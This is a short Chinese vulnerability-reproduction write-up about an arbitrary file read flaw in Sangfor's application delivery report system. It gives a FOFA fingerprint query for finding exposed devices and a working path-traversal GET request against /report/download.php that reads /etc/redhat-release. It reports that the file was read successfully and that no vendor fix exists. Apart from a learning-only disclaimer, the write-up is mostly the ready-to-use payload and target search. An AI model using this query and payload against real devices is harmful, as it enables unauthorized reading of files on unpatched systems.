文章目录
- 深信服应用交付报表系统任意文件读取漏洞复现
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响范围
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 0x06 修复建议
深信服应用交付报表系统任意文件读取漏洞复现
0x01 前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!
0x02 漏洞描述
SINFOR AD是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件。
0x03 影响范围
深信服应用交付报表系统
0x04 漏洞环境
fofa:app=“SANGFOR-应用交付报表系统”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (GET)
GET /report/download.php?pdf=../../../../../etc/redhat-release HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
3.复现
响应成功,文件成功读取到!!!
0x06 修复建议
厂商尚未提供修复方案,请关注厂商主页更新: https://www.sangfor.com.cn/
